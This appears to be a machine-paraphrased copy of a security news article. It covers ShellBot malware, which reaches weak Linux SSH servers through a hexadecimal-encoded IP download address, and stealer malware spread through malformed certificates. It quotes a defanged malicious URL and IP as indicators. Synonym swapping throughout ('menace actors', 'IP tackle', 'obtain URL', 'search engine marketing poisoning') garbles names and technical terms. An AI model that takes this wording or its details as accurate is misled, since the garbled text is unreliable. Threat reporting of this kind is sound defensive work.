The menace actors behind ShellBot are leveraging IP addresses remodeled into their hexadecimal notation to infiltrate poorly managed Linux SSH servers and deploy the DDoS malware.
“The general movement stays the identical, however the obtain URL utilized by the menace actor to put in ShellBot has modified from a daily IP tackle to a hexadecimal worth,” the AhnLab Safety Emergency response Middle (ASEC) stated in a brand new report printed right now.
ShellBot, additionally identified by the title PerlBot, is identified to breach servers which have weak SSH credentials via a dictionary assault, with the malware used as a conduit to stage DDoS assaults and ship cryptocurrency miners.
Developed in Perl, the malware makes use of the IRC protocol to speak with a command-and-control (C2) server.
The most recent set of noticed assaults involving ShellBot has been discovered to put in the malware utilizing hexadecimal IP addresses – hxxp://0x2763da4e/ which corresponds to 39.99.218[.]78 – in what’s seen as an try to evade URL-based detection signatures.
“As a result of utilization of curl for the obtain and its potential to assist hexadecimal similar to net browsers, ShellBot could be downloaded efficiently on a Linux system setting and executed by Perl,” ASEC stated.
The event is an indication that ShellBot continues to witness regular utilization to launch assaults in opposition to Linux programs.
With ShellBot able to getting used to put in further malware or launch various kinds of assaults from the compromised server, it is beneficial that customers change to robust passwords and periodically change them to withstand brute-force and dictionary assaults.
The disclosure additionally comes as ASEC revealed that attackers are weaponizing irregular certificates with unusually lengthy strings for Topic Identify and Issuer Identify fields in a bid to distribute info stealer malware similar to Lumma Stealer and a variant of RedLine Stealer generally known as RecordBreaker.
“These kinds of malware are distributed through malicious pages which might be simply accessible by search engines like google (search engine marketing poisoning), posing a menace to a variety of unspecified customers,” ASEC stated. “These malicious pages primarily use key phrases associated to unlawful packages similar to serials, keygens, and cracks.”
